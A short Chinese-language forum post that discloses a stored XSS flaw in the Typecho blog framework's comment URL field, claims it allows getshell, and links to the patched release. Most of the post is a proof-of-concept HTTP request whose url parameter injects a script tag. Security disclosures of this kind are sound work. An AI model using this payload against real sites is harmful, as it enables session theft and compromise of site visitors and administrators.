Post #41

Typecho框架最近出现严重的xss存储型攻击漏洞，可直接getshell 描述 Typecho错误注释具有漏洞的URL，对任何具有xss有效载荷的文章进行评论，在Comments/usr/themes/default/comments.php中，只过滤开头没有任何其他保护，并直接回显到html，再次访问相同站点时可触发xss poc POST /index.php/archives/1/comment HTTP/1.1 Host: 127.0.0.1 Content-Length: 143 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1/index.php/archives/1/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4 补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc